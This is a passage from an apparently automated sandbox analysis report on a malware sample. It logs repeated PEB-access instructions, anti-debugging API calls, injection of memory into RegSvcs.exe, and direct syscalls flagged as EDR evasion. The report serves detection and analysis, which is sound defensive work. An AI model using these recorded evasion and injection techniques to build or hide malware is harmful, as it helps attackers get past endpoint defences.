            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8918 mov eax, dword ptr fs:[00000030h]15_2_013D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8918 mov eax, dword ptr fs:[00000030h]15_2_013D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E mov eax, dword ptr fs:[00000030h]15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E mov edx, dword ptr fs:[00000030h]15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E mov eax, dword ptr fs:[00000030h]15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484978 mov eax, dword ptr fs:[00000030h]15_2_01484978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484978 mov eax, dword ptr fs:[00000030h]15_2_01484978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C97C mov eax, dword ptr fs:[00000030h]15_2_0146C97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E908 mov eax, dword ptr fs:[00000030h]15_2_0145E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E908 mov eax, dword ptr fs:[00000030h]15_2_0145E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C912 mov eax, dword ptr fs:[00000030h]15_2_0146C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146892A mov eax, dword ptr fs:[00000030h]15_2_0146892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0147892B mov eax, dword ptr fs:[00000030h]15_2_0147892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014769C0 mov eax, dword ptr fs:[00000030h]15_2_014769C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014149D0 mov eax, dword ptr fs:[00000030h]15_2_014149D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E09AD mov eax, dword ptr fs:[00000030h]15_2_013E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E09AD mov eax, dword ptr fs:[00000030h]15_2_013E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA9D3 mov eax, dword ptr fs:[00000030h]15_2_014AA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E9E0 mov eax, dword ptr fs:[00000030h]15_2_0146E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014129F9 mov eax, dword ptr fs:[00000030h]15_2_014129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014129F9 mov eax, dword ptr fs:[00000030h]15_2_014129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov esi, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov eax, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov eax, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410854 mov eax, dword ptr fs:[00000030h]15_2_01410854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E872 mov eax, dword ptr fs:[00000030h]15_2_0146E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E872 mov eax, dword ptr fs:[00000030h]15_2_0146E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476870 mov eax, dword ptr fs:[00000030h]15_2_01476870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476870 mov eax, dword ptr fs:[00000030h]15_2_01476870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C810 mov eax, dword ptr fs:[00000030h]15_2_0146C810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4859 mov eax, dword ptr fs:[00000030h]15_2_013E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4859 mov eax, dword ptr fs:[00000030h]15_2_013E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A830 mov eax, dword ptr fs:[00000030h]15_2_0141A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148483A mov eax, dword ptr fs:[00000030h]15_2_0148483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148483A mov eax, dword ptr fs:[00000030h]15_2_0148483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov ecx, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F2840 mov ecx, dword ptr fs:[00000030h]15_2_013F2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E8C0 mov eax, dword ptr fs:[00000030h]15_2_0140E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B08C0 mov eax, dword ptr fs:[00000030h]15_2_014B08C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA8E4 mov eax, dword ptr fs:[00000030h]15_2_014AA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C8F9 mov eax, dword ptr fs:[00000030h]15_2_0141C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C8F9 mov eax, dword ptr fs:[00000030h]15_2_0141C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0887 mov eax, dword ptr fs:[00000030h]15_2_013E0887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C89D mov eax, dword ptr fs:[00000030h]15_2_0146C89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494B4B mov eax, dword ptr fs:[00000030h]15_2_01494B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494B4B mov eax, dword ptr fs:[00000030h]15_2_01494B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476B40 mov eax, dword ptr fs:[00000030h]15_2_01476B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476B40 mov eax, dword ptr fs:[00000030h]15_2_01476B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AAB40 mov eax, dword ptr fs:[00000030h]15_2_014AAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01488B42 mov eax, dword ptr fs:[00000030h]15_2_01488B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EB50 mov eax, dword ptr fs:[00000030h]15_2_0148EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DCB7E mov eax, dword ptr fs:[00000030h]15_2_013DCB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4B00 mov eax, dword ptr fs:[00000030h]15_2_014B4B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EB20 mov eax, dword ptr fs:[00000030h]15_2_0140EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EB20 mov eax, dword ptr fs:[00000030h]15_2_0140EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A8B28 mov eax, dword ptr fs:[00000030h]15_2_014A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A8B28 mov eax, dword ptr fs:[00000030h]15_2_014A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8B50 mov eax, dword ptr fs:[00000030h]15_2_013D8B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0BBE mov eax, dword ptr fs:[00000030h]15_2_013F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0BBE mov eax, dword ptr fs:[00000030h]15_2_013F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EBD0 mov eax, dword ptr fs:[00000030h]15_2_0148EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146CBF0 mov eax, dword ptr fs:[00000030h]15_2_0146CBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EBFC mov eax, dword ptr fs:[00000030h]15_2_0140EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494BB0 mov eax, dword ptr fs:[00000030h]15_2_01494BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494BB0 mov eax, dword ptr fs:[00000030h]15_2_01494BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EA60 mov eax, dword ptr fs:[00000030h]15_2_0148EA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145CA72 mov eax, dword ptr fs:[00000030h]15_2_0145CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145CA72 mov eax, dword ptr fs:[00000030h]15_2_0145CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146CA11 mov eax, dword ptr fs:[00000030h]15_2_0146CA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0A5B mov eax, dword ptr fs:[00000030h]15_2_013F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0A5B mov eax, dword ptr fs:[00000030h]15_2_013F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA24 mov eax, dword ptr fs:[00000030h]15_2_0141CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EA2E mov eax, dword ptr fs:[00000030h]15_2_0140EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01404A35 mov eax, dword ptr fs:[00000030h]15_2_01404A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01404A35 mov eax, dword ptr fs:[00000030h]15_2_01404A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA38 mov eax, dword ptr fs:[00000030h]15_2_0141CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01414AD0 mov eax, dword ptr fs:[00000030h]15_2_01414AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01414AD0 mov eax, dword ptr fs:[00000030h]15_2_01414AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8AA0 mov eax, dword ptr fs:[00000030h]15_2_013E8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8AA0 mov eax, dword ptr fs:[00000030h]15_2_013E8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141AAEE mov eax, dword ptr fs:[00000030h]15_2_0141AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141AAEE mov eax, dword ptr fs:[00000030h]15_2_0141AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EEA80 mov eax, dword ptr fs:[00000030h]15_2_013EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EEA80 mov eax, dword ptr fs:[00000030h]15_2_013EEA80
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E92CE0 GetProcessHeap,0_2_00E92CE0
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E86878
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E8AAC4
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86A0B SetUnhandledExceptionFilter,0_2_00E86A0B
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E85BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E85BBF
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D929B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D929B2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D80BCF
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80D65 SetUnhandledExceptionFilter,8_2_00D80D65
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00D80FB1

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
